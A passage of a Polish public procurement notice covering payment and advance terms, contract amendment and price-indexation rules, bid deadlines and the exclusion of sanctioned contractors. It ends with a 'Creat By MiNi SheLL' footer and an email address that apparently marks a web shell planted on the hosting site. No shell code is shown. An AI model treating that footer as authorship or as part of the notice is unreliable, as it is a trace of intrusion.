szczegółowych:<br/>a) faktura/y/ częściowe wystawiane po wykonaniu części przedmiotu umowy, po dokonaniu odbioru częściowego, z<br/>zastrzeżeniem, że wynagrodzenie częściowe nie może przekroczyć 80% wynagrodzenia za przedmiot umowy, wskazanego<br/>w § 7 ust. 2 umowy,<br/>b) płatność faktur/y/ częściowych uiszczona będzie w terminie do 30 dni licząc od dnia prawidłowo wystawionej i doręczonej<br/>Zamawiającemu faktury wraz z kompletem odpowiednich dokumentów, o których mowa w ust. 8 poniżej, dotyczących<br/>odpowiednio odbioru częściowego bez uwag,<br/>c) w przypadku płatności częściowych pozostałe 20% wynagrodzenia zostanie wypłacone na podstawie faktury końcowej po<br/>protokolarnym odbiorze końcowym całości przedmiotu umowy bez uwag,<br/>d) w przypadku płatności faktur częściowych, płatność faktury końcowej, która stanowić będzie pozostałe 20%<br/>wynagrodzenia uiszczona będzie w terminie do 30 dni licząc od dnia prawidłowo wystawionej i doręczonej Zamawiającemu<br/>faktury wraz z kompletem odpowiednich dokumentów, o których mowa w par 8 ust. 9, dotyczących odpowiednio odbioru<br/>końcowego bez uwag,<br/>2.2. w przypadku płatności jednorazowej (wg wyboru Wykonawcy) - wystawienie faktury jednorazowej końcowej,<br/>wystawionej po zakończeniu całego przedmiotu umowy i po dokonaniu odbioru końcowego bez uwag, przy czym wkład<br/>własny Zamawiającego, a także jeśli wystąpią środki własne Zamawiającego, to zostaną one wypłacone Wykonawcy przed<br/>wypłatą pozostałej części należnego wynagrodzenia podlegającego zapłacie ze środków, o których mowa w § 7 ust. 15 pkt 1<br/>powyżej, tj. ze środków stanowiących dofinansowanie z Rządowego Programu Polski Ład: Program Inwestycji<br/>Strategicznych. Zapłata wynagrodzenia Wykonawcy Inwestycji w całości nastąpi po odbiorze końcowym Inwestycji<br/>stanowiącej przedmiot umowy w terminie nie dłuższym niż 30 dni przez Zamawiającego wraz z kompletem odpowiednich<br/>dokumentów, o których mowa w ust. 9 poniżej, dotyczących odbioru końcowego bez uwag.<br/>2. Zamawiający przekaże zaliczkę na poczet wykonania przedmiotu umowy w wysokości 5% łącznego wynagrodzenia Wykonawcy, o którym mowa w § 7 ust. 2 projektu umowy, co zgodnie z wymaganiami programu Rządowego Funduszu<br/>Polski Ład: Program Inwestycji Strategicznych, stanowi nie mniej niż 5% wynagrodzenia Wykonawcy.<br/>3. Zaliczka zostanie wypłacona na podstawie faktury zaliczkowej, wystawionej przez Wykonawcę, zgodnie z przepisami<br/>ustawy z dnia 11 marca 2004r. o podatku od towarów i usług (Dz.U. z 2023, poz. 1570 z późn. zm.). Zaliczka zostanie<br/>wypłacona przed wypłatą dofinansowania, o którym mowa w § 7 ust. 15 pkt 1 projektu umowy.<br/>4. Zamawiający przekaże zaliczkę na poczet realizacji przedmiotu umowy na rachunek bankowy Wykonawcy, wskazany w<br/>projekcie umowie w § 8 ust. 13, po złożeniu prawidłowo wystawionej faktury zaliczkowej przez Wykonawcę, w terminie do 30<br/>dni od dnia doręczenia faktury.<br/>5. W przypadku płatności jednorazowej zgodnie z wymaganiami Programu Rządowego Fundusz Polski Ład - Program<br/>Inwestycji Strategicznych, Wykonawca oświadcza, że zapewni finansowanie przedmiotu umowy w części nie pokrytej<br/>udziałem własnym Zamawiającego na czas poprzedzający wypłatę z Promesy.<br/>6. Szczegółowe informacje dot. udzielania zaliczek znajdują się w § 8 projektu umowy - (Załącznik nr 6). <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowanie postanowienia umowy w sprawie zamówienia publicznego zostały zawarte we Wzorze umowy,<br/>stanowiącym Załącznik nr 6 do SWZ.<br/>2. Umowa zawarta zostanie z uwzględnieniem postanowień wynikających z treści SWZ oraz danych zawartych w ofercie.<br/>3. Zamawiający przewidział wszystkie istotne dla stron postanowienia oraz przyszłe zobowiązania Wykonawcy i<br/>Zamawiającego, w tym dotyczące możliwości dokonania zmian w § 2, 6, 7, 14<br/>w projekcie umowy.<br/>4. Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności<br/>zmiany. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.<br/>5. Zasady wprowadzania zmian wysokości wynagrodzenia:<br/>1) Wynagrodzenie Wykonawcy może zostać zmienione poprzez zmianę cen jednostkowych netto z oferty Wykonawcy<br/>stanowiącej jako załącznik nr 1 integralną część niniejszej umowy, przy łącznym spełnieniu następujących warunków:<br/>a) Wykonawca może złożyć pisemny wniosek o przeprowadzenie negocjacji w sprawie zmiany wynagrodzenia po upływie<br/>co najmniej 6 miesięcy od dnia zawarcia niniejszej umowy, przy jednoczesnym wypełnieniu przez Wykonawcę obowiązku<br/>wykonania w okresie 6 miesięcy nie mniej niż 50 % (słownie: pięćdziesiąt procent) wartości przedmiotu umowy,<br/>określonego w § 7 ust. 2,<br/>b) do wniosku, o którym mowa w pkt 1 powyżej Wykonawca winien dołączyć wyliczenie wnioskowanej kwoty zmiany<br/>wynagrodzenia za roboty, z wyłączeniem robót o których mowa w pkt c poniżej, w szczególności zwaloryzowany kosztorys<br/>ofertowy z cenami jednostkowymi, szczegółowy kosztorys ofertowy z zestawieniem cen, ilości, wartości materiałów i sprzętu,<br/>c) zmiana wynagrodzenia nie może dotyczyć:<br/>• robót wykonanych przed złożeniem wniosku, o którym mowa w pkt 1a powyżej - zmianie podlegać będzie wyłączenie<br/>wynagrodzenie Wykonawcy za roboty pozostałe do wykonania,<br/>• robót wykonanych po terminie określonym w zatwierdzonym przez Zamawiającego harmonogramie rzeczowo –<br/>finansowym- załącznik nr 3 do umowy,<br/>d) podstawą do zmiany wysokości wynagrodzenia będzie wyliczony procentowy wzrost cen produkcji budowlanomontażowej,<br/>zwany dalej wskaźnikiem waloryzacji, o co najmniej 15% (słownie: piętnaście procent) w porównaniu ze<br/>wskaźnikiem ogłoszonym przez Prezesa Głównego Urzędu Statystycznego za kwartał, w którym Wykonawca złożył ofertę,<br/>stanowiącą podstawę do zawarcia niniejszej umowy,<br/>e) jeśli wskaźnik waloryzacji nie przekroczy 15% (słownie: piętnaście procent) zwiększenie wynagrodzenia nie będzie<br/>możliwe,<br/>2) Maksymalna wartość zmiany wynagrodzenia netto, jaką dopuszcza Zamawiający w efekcie zastosowania postanowień<br/>niniejszego paragrafu, nie może przekroczyć 8% (słownie: osiem procent) wynagrodzenia netto, o którym mowa w § 7 ust. 2<br/>umowy.<br/>3) Zamawiający ma prawo do zmiany wysokości wynagrodzenia Wykonawcy polegającej na jego obniżeniu w przypadku,<br/>gdy po upływie 6 miesięcy od dnia zawarcia niniejszej umowy wskaźnik waloryzacji obliczony według wyżej określonych<br/>zasad w niniejszym paragrafie obniży się więcej niż o 15% tj. nastąpi obniżenie cen materiałów lub kosztów.<br/>4) Więcej informacji o zasadach wprowadzania zmian wysokości wynagrodzenia znajdują się w Projekcie umowy w § 15.<br/>6. Poza sytuacjami dopuszczającymi dokonanie zmian umowy, przewidzianymi we wzorze umowy, dopuszczalne są<br/>wszelkie zmiany nieistotne umowy rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postanowienia o<br/>zamówieniu nie wpłynęłyby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania. Takimi<br/>zmianami są zmiany o charakterze administracyjno-organizacyjnym umowy np. zmiana nr konta bankowego, dotyczące<br/>nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, innych danych<br/>identyfikacyjnych, zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy.<br/>7. Zmiany umowy nie mogą naruszać postanowień zawartych w art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-11 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835) z postępowania o<br/>udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych wyklucza się:<br/>1) Wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo<br/>wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w<br/>art. 1 pkt 3,<br/>2) Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu<br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust 1 pkt 37 ustawy z dnia 29 września 1994 r. o<br/>rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu<br/>765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostka dominującą od dnia 24 lutego 2022 r.,<br/>o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3. (Art. 1 pkt 3 – W celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej<br/>w dniu 24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2, stosuje się: wykluczenie z<br/>postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11września<br/>2019 r. – Prawo zamówień publicznych (Dz. U. z 2021. Poz. 1129, 1598, 2054 i 2269 oraz z 2022 r. poz. 25).

Creat By MiNi SheLL
Email: jattceo@gmail.com